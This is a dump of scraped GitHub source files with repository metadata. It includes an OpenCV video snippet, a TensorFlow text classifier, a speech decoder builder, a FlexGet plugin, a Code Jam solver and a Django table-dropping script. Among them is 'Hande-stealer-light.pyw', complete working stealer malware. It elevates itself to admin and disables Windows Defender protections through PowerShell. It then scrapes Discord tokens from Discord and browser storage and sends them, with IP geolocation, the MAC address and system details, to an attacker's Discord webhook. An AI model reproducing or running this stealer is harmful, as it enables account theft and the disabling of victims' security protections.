# mog2bs = cv.createBackgroundSubtractorKNN(500, 1000, False) # KNN模型
mog2bs = cv.createBackgroundSubtractorMOG2(300) # GMM模型
while True:
ret, frame = capture.read()
if True is not ret:
print("can't read any video!")
break
mask = mog2bs.apply(frame)
background = mog2bs.getBackgroundImage()
cv.imshow("input", frame)
cv.imshow("mask", mask)
cv.imshow("background", background)
key = cv.waitKey(10) & 0xff
if 27 == key: # ESC
break
cv.destroyAllWindows()
capture.release()
if "__main__" == __name__:
main()
| [
"[email protected]"
] | |
c5b3e70cd3d41f6a2d4b0180f56af70231b4bae0 | 12d05a7f65e6ca8ffa701670ed1bec209af77a51 | /models/Attention_Textcnn_loss_para/network.py | b5a447c68d31e9b7261fa5b9adbf9aa16bbb0620 | [] | no_license | Bobby-Han/text-classification | ec8015e6bb438fceb8d7b61117519e2d6469c57d | 2fa6d3ed4f3b9288ff7fb385c9cced44daf522ca | refs/heads/master | 2023-02-24T13:27:36.761439 | 2021-02-01T06:27:53 | 2021-02-01T06:27:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,421 | py | # -*- coding:utf-8 -*-
import tensorflow as tf
import tensorflow.contrib.layers as layers
import numpy as np
from tensorflow.contrib.crf import crf_log_likelihood
import keras.backend as K
class Settings(object):
def __init__(self):
self.model_name = 'Attention_TextCNN_loss_para'
self.fact_len = 200
self.filter_sizes = [1, 2, 3, 4, 5]
self.n_filter = 256
self.fc_hidden_size = 2000
self.hidden_size = 256
self.n_class = 202
self.loss_type = 'focal_loss'
self.summary_path = '../../summary/' + self.model_name + '/'
self.ckpt_path = '../../ckpt/' + self.model_name + '/'
self.log_path = '../../log/' + self.model_name + '/'
class Atten_TextCNN(object):
def __init__(self, W_embedding, settings):
self.model_name = settings.model_name
self.fact_len = settings.fact_len
self.hidden_size = settings.hidden_size
self.n_class = settings.n_class
self.filter_sizes = settings.filter_sizes
self.n_filter = settings.n_filter
self.n_filter_total = self.n_filter * len(self.filter_sizes)
self.fc_hidden_size = settings.fc_hidden_size
self.loss_type = settings.loss_type
self._global_step = tf.Variable(0, trainable=False, name='Global_Step')
self.update_emas = list()
self._tst = tf.placeholder(tf.bool)
self._keep_prob = tf.placeholder(tf.float32, [])
self._batch_size = tf.placeholder(tf.int32, [])
with tf.name_scope('Inputs'):
self._X_inputs = tf.placeholder(tf.int32, [None, self.fact_len], name='X_input')
self._y_inputs = tf.placeholder(tf.float32, [None, self.n_class], name='y_input')
with tf.variable_scope('embedding'):
self.embedding = tf.get_variable(name='embedding', shape=W_embedding.shape,
initializer=tf.constant_initializer(W_embedding), trainable=True)
self.embedding_size = W_embedding.shape[1]
with tf.variable_scope('Atten_TextCNN'):
output = self._inference(self._X_inputs)
with tf.variable_scope('fc-bn-layer'):
W_fc = self.weight_variable([self.n_filter_total, self.fc_hidden_size], name='Weight_fc')
tf.summary.histogram('W_fc', W_fc)
h_fc = tf.matmul(output, W_fc, name='h_fc')
beta_fc = tf.Variable(tf.constant(0.1, tf.float32, shape=[self.fc_hidden_size], name="beta_fc"))
tf.summary.histogram('beta_fc', beta_fc)
fc_bn, update_ema_fc = self.batchnorm(h_fc, beta_fc, convolutional=False)
self.update_emas.append(update_ema_fc)
self.fc_bn_relu = tf.nn.relu(fc_bn, name="relu")
with tf.variable_scope('out_layer'):
W_out = self.weight_variable([self.fc_hidden_size, self.n_class], name='Weight_out')
tf.summary.histogram('Weight_out', W_out)
b_out = self.bias_variable([self.n_class], name='bias_out')
tf.summary.histogram('bias_out', b_out)
self._y_pred = tf.nn.xw_plus_b(self.fc_bn_relu, W_out, b_out, name='y_pred') # 每个类别的分数 scores
self.labels = tf.sigmoid(self._y_pred)
# with tf.name_scope('loss'):
# self._loss = tf.reduce_mean(
# tf.nn.sigmoid_cross_entropy_with_logits(logits=self._y_pred, labels=self._y_inputs))
# tf.summary.scalar('loss', self._loss)
with tf.name_scope('loss'):
self._loss = self.focal_loss(self.y_inputs, self.y_pred)
self.saver = tf.train.Saver(max_to_keep=1)
def focal_loss(self, labels, logits, gamma=2.0, alpha=0.25, normalize=True):
labels = tf.where(labels > 0, tf.ones_like(labels), tf.zeros_like(labels))
labels = tf.cast(labels, tf.float32)
probs = tf.sigmoid(logits)
ce_loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
alpha_t = tf.ones_like(logits) * alpha
alpha_t = tf.where(labels > 0, alpha_t, 1.0 - alpha_t)
probs_t = tf.where(labels > 0, probs, 1.0 - probs)
# tf.where(input, a,b),其中a,b均为尺寸一致的tensor,作用是将a中对应input中true的位置的元素值不变,其余元素进行替换,替换成b中对应位置的元素值
focal_matrix = alpha_t * tf.pow((1.0 - probs_t), gamma)
loss = focal_matrix * ce_loss
loss = tf.reduce_sum(loss)
if normalize:
n_pos = tf.reduce_sum(labels)
# total_weights = tf.stop_gradient(tf.reduce_sum(focal_matrix))
# total_weights = tf.Print(total_weights, [n_pos, total_weights])
# loss = loss / total_weights
def has_pos():
return loss / tf.cast(n_pos, tf.float32)
def no_pos():
#total_weights = tf.stop_gradient(tf.reduce_sum(focal_matrix))
#return loss / total_weights
return loss
loss = tf.cond(n_pos > 0, has_pos, no_pos)
return loss
def loss_func(self, logits, labels):
# logits = logits[:, 0, 0, 0]
# labels = tf.equal(labels, 1)
labels = tf.cast(labels, tf.float32)
if self.loss_type == 'focal_loss':
loss = self.focal_loss(labels=labels, logits=logits,
gamma=2.0, alpha=0.25)
elif self.loss_type == 'ce_loss':
ce_loss = tf.nn.sigmoid_cross_entropy_with_logits(
labels = labels, logits = logits)
num_samples = tf.cast(tf.reduce_prod(tf.shape(labels)), tf.float32)
loss = tf.reduce_sum(ce_loss) / num_samples
elif self.loss_type == 'cls_balance':
ce_loss = tf.nn.sigmoid_cross_entropy_with_logits(
labels = labels, logits = logits)
pos_weight = tf.cast(tf.equal(labels, 1), tf.float32)
neg_weight = 1 - pos_weight
n_pos = tf.reduce_sum(pos_weight)
n_neg = tf.reduce_sum(neg_weight)
def has_pos():
return tf.reduce_sum(ce_loss * pos_weight) / n_pos
def has_neg():
return tf.reduce_sum(ce_loss * neg_weight) / n_neg
def no():
return tf.constant(0.0)
pos_loss = tf.cond(n_pos > 0, has_pos, no)
neg_loss = tf.cond(n_neg > 0, has_neg, no)
loss = (pos_loss + neg_loss) / 2.0
# elif self.loss_type == 'ohnm':
# ce_loss = tf.nn.sigmoid_cross_entropy_with_logits(
# labels = labels, logits = logits)
# pos_weight = tf.cast(tf.equal(labels, 1), tf.float32)
# neg_weight = 1 - pos_weight
# n_pos = tf.reduce_sum(pos_weight)
# n_neg = tf.reduce_sum(neg_weight)
#
#
# # find the most wrongly classified negative examples:
# n_selected = tf.minimum(n_pos * 3, n_neg)
# n_selected = tf.cast(tf.maximum(n_selected, 1), tf.int32)
#
# neg_mask = tf.equal(labels, 0)
# hardness = tf.where(neg_mask, ce_loss, tf.zeros_like(ce_loss))
# vals, _ = tf.nn.top_k(neg_scores, k = n_selected)
# th = vals[-1]
# selected_neg_mask = tf.logical_and(hardness >= th, neg_mask)
# neg_weight = tf.cast(selected_neg_mask, tf.float32)
#
# loss_weight = pos_weight + neg_weight
# loss = tf.reduce_sum(ce_loss * loss_weight) / tf.reduce_sum(loss_weight)
elif self.loss_type == 'ohem':
ce_loss = tf.nn.sigmoid_cross_entropy_with_logits(
labels = labels, logits = logits)
# find the most wrongly classified examples:
num_examples = tf.reduce_prod(labels.shape)
n_selected = tf.cast(num_examples / 2, tf.int32)
vals, _ = tf.nn.top_k(ce_loss, k = n_selected)
th = vals[-1]
selected_mask = ce_loss >= th
loss_weight = tf.cast(selected_mask, tf.float32)
loss = tf.reduce_sum(ce_loss * loss_weight) / tf.reduce_sum(loss_weight)
else:
raise ValueError('Unknow loss_type:', self.loss_type)
return loss
@property
def tst(self):
return self._tst
@property
def keep_prob(self):
return self._keep_prob
@property
def batch_size(self):
return self._batch_size
@property
def global_step(self):
return self._global_step
@property
def X_inputs(self):
return self._X_inputs
@property
def y_inputs(self):
return self._y_inputs
@property
def y_pred(self):
return self._y_pred
@property
def loss(self):
return self._loss
def weight_variable(self, shape, name):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=name)
def bias_variable(self, shape, name):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=name)
def batchnorm(self, Ylogits, offset, convolutional=False):
exp_moving_avg = tf.train.ExponentialMovingAverage(0.999, self._global_step)
bnepsilon = 1e-5
if convolutional:
mean, variance = tf.nn.moments(Ylogits, [0, 1, 2])
else:
mean, variance = tf.nn.moments(Ylogits, [0])
update_moving_everages = exp_moving_avg.apply([mean, variance])
m = tf.cond(self.tst, lambda: exp_moving_avg.average(mean), lambda: mean)
v = tf.cond(self.tst, lambda: exp_moving_avg.average(variance), lambda: variance)
Ybn = tf.nn.batch_normalization(Ylogits, m, v, offset, None, bnepsilon)
return Ybn, update_moving_everages
def task_specific_attention(self, inputs, output_size,
initializer=layers.xavier_initializer(),
activation_fn=tf.tanh, scope=None):
assert len(inputs.get_shape()) == 3 and inputs.get_shape()[-1].value is not None
with tf.variable_scope(scope or 'attention') as scope:
attention_context_vector = tf.get_variable(name='attention_context_vector', shape=[output_size],
initializer=initializer, dtype=tf.float32)
input_projection = layers.fully_connected(inputs, output_size,
activation_fn=activation_fn, scope=scope)
vector_attn = tf.reduce_sum(tf.multiply(input_projection, attention_context_vector),
axis=2, keep_dims=True)
attention_weights = tf.nn.softmax(vector_attn, dim=1)
tf.summary.histogram('attention_weigths', attention_weights)
weighted_projection = tf.multiply(inputs, attention_weights)
return weighted_projection
def TextCNN(self, X_inputs, n_step):
inputs = tf.expand_dims(X_inputs, -1)
pooled_outputs = list()
for i, filter_size in enumerate(self.filter_sizes):
with tf.variable_scope("conv-maxpool-%s" % filter_size):
filter_shape = [filter_size, self.embedding_size, 1, self.n_filter]
W_filter = self.weight_variable(shape=filter_shape, name='W_filter')
beta = self.bias_variable(shape=[self.n_filter], name='beta_filter')
tf.summary.histogram('beta', beta)
conv = tf.nn.conv2d(inputs, W_filter, strides=[1, 1, 1, 1], padding="VALID", name="conv")
conv_bn, update_ema = self.batchnorm(conv, beta, convolutional=True)
h = tf.nn.relu(conv_bn, name="relu")
pooled = tf.nn.max_pool(h, ksize=[1, n_step - filter_size + 1, 1, 1],
strides=[1, 1, 1, 1], padding='VALID', name="pool")
pooled_outputs.append(pooled)
self.update_emas.append(update_ema)
h_pool = tf.concat(pooled_outputs, 3)
h_pool_flat = tf.reshape(h_pool, [-1, self.n_filter_total])
return h_pool_flat
def _inference(self, X_inputs):
inputs = tf.nn.embedding_lookup(self.embedding, X_inputs)
output_att = self.task_specific_attention(inputs, self.embedding_size)
textcnn_out = self.TextCNN(output_att, self.fact_len)
return textcnn_out
| [
"[email protected]"
] | |
0c1776f6bd320e7f308bee7b96fd85ce0f010a7c | aed0016db7f4d22e7d66e6fddb7bf4ef68a3c692 | /neural_sp/models/seq2seq/decoders/build.py | 0f813cfcdda9ab87c1f3eab770b881268e309039 | [] | no_license | thanhkm/neural_sp | 6a5575111c83d1fdd97edec21f90fe647965cb69 | 1a5a5ed54f4cb79436007593dbd0d782b246a0c7 | refs/heads/master | 2020-12-26T23:22:56.964151 | 2020-01-15T23:40:22 | 2020-01-15T23:40:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,001 | py | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Select an decoder network."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
def build_decoder(args, special_symbols, enc_n_units, vocab,
ctc_weight, ctc_fc_list, global_weight,
lm_fusion=None, lm_init=None):
if args.dec_type == 'transformer':
if args.attn_type == 'cif':
raise NotImplementedError
else:
from neural_sp.models.seq2seq.decoders.transformer import TransformerDecoder
decoder = TransformerDecoder(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.transformer_attn_type,
n_heads=args.transformer_n_heads,
n_layers=args.dec_n_layers,
d_model=args.transformer_d_model,
d_ff=args.transformer_d_ff,
layer_norm_eps=args.transformer_layer_norm_eps,
ffn_activation=args.transformer_ffn_activation,
pe_type=args.transformer_dec_pe_type,
vocab=vocab,
tie_embedding=args.tie_embedding,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
backward=(dir == 'bwd'),
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.transformer_param_init)
elif args.dec_type == 'transformer_transducer':
raise NotImplementedError
from neural_sp.models.seq2seq.decoders.transformer_transducer import TrasformerTransducer
decoder = TrasformerTransducer(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.transformer_attn_type,
n_heads=args.transformer_n_heads,
n_layers=args.dec_n_layers,
d_model=args.transformer_d_model,
d_ff=args.transformer_d_ff,
layer_norm_eps=args.transformer_layer_norm_eps,
ffn_activation=args.transformer_ffn_activation,
pe_type=args.transformer_dec_pe_type,
vocab=vocab,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.transformer_param_init)
elif args.dec_type in ['lstm_transducer', 'gru_transducer']:
from neural_sp.models.seq2seq.decoders.rnn_transducer import RNNTransducer
decoder = RNNTransducer(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
rnn_type=args.dec_type,
n_units=args.dec_n_units,
n_projs=args.dec_n_projs,
n_layers=args.dec_n_layers,
bottleneck_dim=args.dec_bottleneck_dim,
emb_dim=args.emb_dim,
vocab=vocab,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.param_init)
else:
from neural_sp.models.seq2seq.decoders.las import RNNDecoder
decoder = RNNDecoder(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.attn_type,
attn_dim=args.attn_dim,
attn_sharpening_factor=args.attn_sharpening_factor,
attn_sigmoid_smoothing=args.attn_sigmoid,
attn_conv_out_channels=args.attn_conv_n_channels,
attn_conv_kernel_size=args.attn_conv_width,
attn_n_heads=args.attn_n_heads,
rnn_type=args.dec_type,
n_units=args.dec_n_units,
n_projs=args.dec_n_projs,
n_layers=args.dec_n_layers,
bottleneck_dim=args.dec_bottleneck_dim,
emb_dim=args.emb_dim,
vocab=vocab,
tie_embedding=args.tie_embedding,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
ss_prob=args.ss_prob,
ss_type=args.ss_type,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
mbr_weight=args.mbr_weight,
mbr_nbest=args.mbr_nbest,
mbr_softmax_smoothing=args.mbr_softmax_smoothing,
backward=(dir == 'bwd'),
lm_fusion=lm_fusion,
lm_fusion_type=args.lm_fusion_type,
discourse_aware=args.discourse_aware,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.param_init,
mocha_chunk_size=args.mocha_chunk_size,
mocha_adaptive=args.mocha_adaptive,
mocha_1dconv=args.mocha_1dconv,
mocha_quantity_loss_weight=args.mocha_quantity_loss_weight,
mocha_ctc_sync=args.mocha_ctc_sync,
gmm_attn_n_mixtures=args.gmm_attn_n_mixtures,
replace_sos=args.replace_sos,
soft_label_weight=args.soft_label_weight)
return decoder
| [
"[email protected]"
] | |
f922cf4ebb4055119a9e0e2468630b05bc1bef64 | 4c156a21245ad414e9495a5f59cf4d4427759255 | /Hande-stealer-light.pyw | bc3b565fbf2f6a752a14e35e78d669b8ef71b666 | [
"MIT"
] | permissive | simplifies/Hande-Stealer | f464bd56695726058d2a6084f6ba6cd7afd33ba6 | da5244c774e9bf66c5c1870b6cab3d194b4890ff | refs/heads/main | 2023-04-06T07:07:38.471222 | 2021-04-13T10:52:42 | 2021-04-13T10:52:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,537 | pyw | import os
import re
import platform
import time
import requests
from io import BytesIO
import json
from dhooks import Webhook, Embed, File
from datetime import datetime
import sys
import win32com.shell.shell as shell
from getmac import get_mac_address as gma
ASADMIN = 'asadmin'
if sys.argv[-1] != ASADMIN:
script = os.path.abspath(sys.argv[0])
params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
sys.exit(0)
os.system("powershell.exe -command Add-MpPreference -ExclusionExtension .exe")
os.system("powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disabled")
os.system("powershell.exe -command Set-MpPreference -PUAProtection disable")
hook = Webhook("https://Your Webhook Url") #change this
embed = Embed(
description='Hande-Stealer From Swagkarna! :smiley:',
color=0x5CDBF0,
timestamp='now'
)
image1 = 'https://avatars.githubusercontent.com/u/79452028?s=460&u=0602f46611611527d9f4147aa67c47fa4b2fe739&v=4'
embed.set_author(name='Author : swagkarna', icon_url=image1)
embed.add_field(name='Github Profile', value='https://github.com/swagkarna')
embed.add_field(name='Youtube', value='https://www.youtube.com/channel/UCszs81OmjgsLzNsgk3f4yxw')
embed.set_footer(text='Happy Hacking', icon_url=image1)
embed.set_thumbnail(image1)
hook.send(embed=embed)
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
time.sleep(1)
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
message = ''
paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
for platform, path in paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
if len(tokens) > 0:
for token in tokens:
message += f'`{token}`\n\n'
else:
message += 'No tokens found.\n'
hook.send(f'{platform}\n{message}')
main()
def stealip():
time = datetime.now().strftime("%H:%M %p")
ip = requests.get('https://api.ipify.org/').text
r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')
geo = r.json()
embed = Embed()
fields = [
{'name': 'IP', 'value': geo['query']},
{'name': 'ipType', 'value': geo['ipType']},
{'name': 'Country', 'value': geo['country']},
{'name': 'City', 'value': geo['city']},
{'name': 'Continent', 'value': geo['continent']},
{'name': 'Country', 'value': geo['country']},
{'name': 'IPName', 'value': geo['ipName']},
{'name': 'ISP', 'value': geo['isp']},
{'name': 'Latitute', 'value': geo['lat']},
{'name': 'Longitude', 'value': geo['lon']},
{'name': 'Org', 'value': geo['org']},
{'name': 'Region', 'value': geo['region']},
{'name': 'Status', 'value': geo['status']},
]
for field in fields:
if field['value']:
embed.add_field(name=field['name'], value=field['value'], inline=True)
hook.send(embed=embed)
def stealmac():
y = gma()
hook.send("Mac Address : ")
hook.send(y)
stealmac()
def GetSysInfo():
my_system = platform.uname()
hook.send("System Information : ")
hook.send(f"System: {my_system.system}")
hook.send(f"Node Name: {my_system.node}")
hook.send(f"Release: {my_system.release}")
hook.send(f"Version: {my_system.version}")
hook.send(f"Machine: {my_system.machine}")
hook.send(f"Processor: {my_system.processor}")
GetSysInfo()
stealip()
| [
"[email protected]"
] | |
f2ae332d7f80b1cdc90b00f90cafce55f4156e08 | 136c4241843a000020062413ad6ff4d6de8bdf58 | /flexget/plugins/services/myepisodes.py | 95187a0788efde709113b6c8e52b0f8b0411d974 | [
"MIT"
] | permissive | ebadenes/Flexget-Origin | d580b9d0bcd65999d2bba6a7051ed19713c7792d | abc05c8bb99f5241b509c3e403eb399413a60dac | refs/heads/master | 2021-01-16T19:22:39.003993 | 2013-04-29T17:32:32 | 2013-04-29T17:32:32 | 9,701,035 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,693 | py | from __future__ import unicode_literals, division, absolute_import
import logging
import urllib
import urllib2
import re
import cookielib
from datetime import datetime
from sqlalchemy import Column, Integer, String, DateTime
from flexget import schema
from flexget.plugin import register_plugin, DependencyError, PluginWarning
try:
from flexget.plugins.api_tvdb import lookup_series
except ImportError:
raise DependencyError(issued_by='myepisodes', missing='api_tvdb',
message='myepisodes requires the `api_tvdb` plugin')
log = logging.getLogger('myepisodes')
Base = schema.versioned_base('myepisodes', 0)
class MyEpisodesInfo(Base):
__tablename__ = 'myepisodes'
id = Column(Integer, primary_key=True)
series_name = Column(String, unique=True)
myepisodes_id = Column(Integer, unique=True)
updated = Column(DateTime)
def __init__(self, series_name, myepisodes_id):
self.series_name = series_name
self.myepisodes_id = myepisodes_id
self.updated = datetime.now()
def __repr__(self):
return '<MyEpisodesInfo(series_name=%s, myepisodes_id=%s)>' % (self.series_name, self.myepisodes_id)
class MyEpisodes(object):
"""
Marks a series episode as acquired in your myepisodes.com account.
Simple Example:
Most shows are recognized automatically from their TVDBname.
And of course the plugin needs to know your MyEpisodes.com account details.
tasks:
tvshows:
myepisodes:
username: <username>
password: <password>
series:
- human target
- chuck
Advanced Example:
In some cases, the TVDB name is either not unique or won't even be discovered.
In that case you need to specify the MyEpisodes id manually using the set plugin.
tasks:
tvshows:
myepisodes:
username: <username>
password: <password>
series:
- human target:
set:
myepisodes_id: 5111
- chuck
How to find the MyEpisodes id: http://matrixagents.org/screencasts/myep_example-20110507-131555.png
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('text', key='username', required=True)
root.accept('text', key='password', required=True)
return root
def on_task_exit(self, task, config):
"""Mark all accepted episodes as acquired on MyEpisodes"""
if not task.accepted:
# Nothing accepted, don't do anything
return
username = config['username']
password = config['password']
cookiejar = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
baseurl = urllib2.Request('http://myepisodes.com/login.php?')
loginparams = urllib.urlencode({'username': username,
'password': password,
'action': 'Login'})
try:
logincon = opener.open(baseurl, loginparams)
loginsrc = logincon.read()
except urllib2.URLError as e:
log.error('Error logging in to myepisodes: %s' % e)
return
if str(username) not in loginsrc:
raise PluginWarning(('Login to myepisodes.com failed, please check '
'your account data or see if the site is down.'), log)
for entry in task.accepted:
try:
self.mark_episode(task, entry, opener)
except PluginWarning as w:
log.warning(str(w))
def lookup_myepisodes_id(self, entry, opener, session):
"""Populates myepisodes_id field for an entry, and returns the id.
Call will also set entry field `myepisode_id` if successful.
Return:
myepisode id
Raises:
LookupError if entry does not have field series_name
"""
# Don't need to look it up if we already have it.
if entry.get('myepisodes_id'):
return entry['myepisodes_id']
if not entry.get('series_name'):
raise LookupError('Cannot lookup myepisodes id for entries without series_name')
series_name = entry['series_name']
# First check if we already have a myepisodes id stored for this series
myepisodes_info = session.query(MyEpisodesInfo).\
filter(MyEpisodesInfo.series_name == series_name.lower()).first()
if myepisodes_info:
entry['myepisodes_id'] = myepisodes_info.myepisodes_id
return myepisodes_info.myepisodes_id
# Get the series name from thetvdb to increase match chance on myepisodes
if entry.get('tvdb_series_name'):
query_name = entry['tvdb_series_name']
else:
try:
series = lookup_series(name=series_name, tvdb_id=entry.get('tvdb_id'))
query_name = series.seriesname
except LookupError as e:
log.warning('Unable to lookup series `%s` from tvdb, using raw name.' % series_name)
query_name = series_name
baseurl = urllib2.Request('http://myepisodes.com/search.php?')
params = urllib.urlencode({'tvshow': query_name, 'action': 'Search myepisodes.com'})
try:
con = opener.open(baseurl, params)
txt = con.read()
except urllib2.URLError as e:
log.error('Error searching for myepisodes id: %s' % e)
matchObj = re.search(r'&showid=([0-9]*)">' + query_name + '</a>', txt, re.MULTILINE | re.IGNORECASE)
if matchObj:
myepisodes_id = matchObj.group(1)
db_item = session.query(MyEpisodesInfo).filter(MyEpisodesInfo.myepisodes_id == myepisodes_id).first()
if db_item:
log.info('Changing name to `%s` for series with myepisodes_id %s' %
(series_name.lower(), myepisodes_id))
db_item.series_name = series_name.lower()
else:
session.add(MyEpisodesInfo(series_name.lower(), myepisodes_id))
entry['myepisodes_id'] = myepisodes_id
return myepisodes_id
def mark_episode(self, task, entry, opener):
"""Mark episode as acquired.
Required entry fields:
- series_name
- series_season
- series_episode
Raises:
PluginWarning if operation fails
"""
if 'series_season' not in entry or 'series_episode' not in entry or 'series_name' not in entry:
raise PluginWarning(
'Can\'t mark entry `%s` in myepisodes without series_season, series_episode and series_name fields' %
entry['title'], log)
if not self.lookup_myepisodes_id(entry, opener, session=task.session):
raise PluginWarning('Couldn\'t get myepisodes id for `%s`' % entry['title'], log)
myepisodes_id = entry['myepisodes_id']
season = entry['series_season']
episode = entry['series_episode']
if task.manager.options.test:
log.info('Would mark %s of `%s` as acquired.' % (entry['series_id'], entry['series_name']))
else:
baseurl2 = urllib2.Request(
'http://myepisodes.com/myshows.php?action=Update&showid=%s&season=%s&episode=%s&seen=0' %
(myepisodes_id, season, episode))
opener.open(baseurl2)
log.info('Marked %s of `%s` as acquired.' % (entry['series_id'], entry['series_name']))
register_plugin(MyEpisodes, 'myepisodes', api_ver=2)
| [
"[email protected]"
] | |
2960c363204b3c970270b04ba3da510e16c8b043 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/joshg111/c.py | 3247ad1bc43608716c4eafcf837e3f50658944a0 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,836 | py | import fileinput
from math import sqrt; from itertools import count, islice
def get_divisor(x):
# Stopping checking for divisors when we hit some pre defined maximum.
#for i in islice(count(2), 1000000):
for i in xrange(2, 1000):
if (x % i) == 0:
# This is the case it is not a prime. Return the divisor.
return i
# This is a prime. Unable to get divisor.
return None
def init(n):
x = 1
for i in xrange(n-1):
x *= 10
return x+1
def gen_num(n):
len_perm = (n - 2)
perms = 2 ** len_perm
formatter = '{:0' + str(len_perm) + 'b}'
for i in xrange(perms):
s = formatter.format(i)
s = '1' + s + '1'
yield s
def output_jam(s, divisors):
f.write(s + " ")
for d in divisors:
f.write(str(d) + " ")
f.write("\n")
def gen_jamcoin(n, j):
jams = 0
g_i = gen_num(n)
while jams < j:
s = g_i.next()
divisors = []
found_jam = True
for b in xrange(2, 11):
# Check all the bases
divisor = get_divisor(long(s, b))
if not divisor:
found_jam = False
break
else:
divisors.append(divisor)
if found_jam:
output_jam(s, divisors)
jams += 1
print "jams = " + str(jams)
f = open('workfile_large', 'w')
if __name__ == "__main__":
i = 1
f_i = fileinput.input()
tests = f_i.next()
for line in f_i:
n, j = map(int, line.split(' '))
f.write("Case #" + str(i) + ":\n")
gen_jamcoin(n, j)
i += 1
f.close()
f_i.close() | [
"[[email protected]]"
] | |
f3627f85293749abf4bdc02e42166c7f1307955f | 779c7d032eb8d5a4421b8b236c9004559b70756d | /import/drop_cache_tables.py | b74d0ed6091fcc4373b1d48df17bf6f274748eb8 | [] | no_license | corincerami/opus | 727e91a461a6488f2bc263ca6c98a27a93424228 | 281f246ff5bd703a009ab3bad6271249e0e00bff | refs/heads/master | 2022-11-11T13:46:06.317320 | 2018-01-11T00:33:54 | 2018-01-11T00:33:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,262 | py | """
drops all tables like 'cache%' in database 'opus'
"""
# Set up the Django Enviroment for running as shell script
import sys
import os
import django
from django.conf import settings
# sys.path.append('/Users/lballard/projects/opus/')
sys.path.append('/home/django/djcode/') #srvr
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "opus.settings")
# from opus import settings
# settings.configure(CACHES=settings.CACHES, DATABASES=settings.DATABASES) # include any other settings you might need
django.setup()
# script imports
from os import system
from django.db import transaction, connection, reset_queries
from django.core.management import call_command
from django.db.utils import DatabaseError
from settings import MULT_FIELDS # DATABASES creds only
from secrets import DB_ADMIN, DB_ADMIN_PASS
cursor = connection.cursor()
# forget about it
# from settings_local import opus1, opus_to_deploy # names of the databases
database = 'opus'
# drop cache tables
cursor.execute("show tables in {} like 'cache%'".format(database))
all_cache_tables = [row[0] for row in cursor.fetchall() if row[0]]
for cache_table in all_cache_tables:
q_up = "drop table {}.{}".format(database, cache_table)
cursor.execute(q_up)
print q_up
print "Done!"
| [
"[email protected]"
] | |
